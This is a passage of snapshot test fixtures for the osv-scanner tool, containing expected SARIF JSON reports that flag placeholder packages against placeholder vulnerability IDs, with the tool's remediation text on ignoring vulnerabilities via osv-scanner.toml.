"rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/third/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.2' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-3'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@1.2.3' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.2' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-3'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@1.2.3' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this 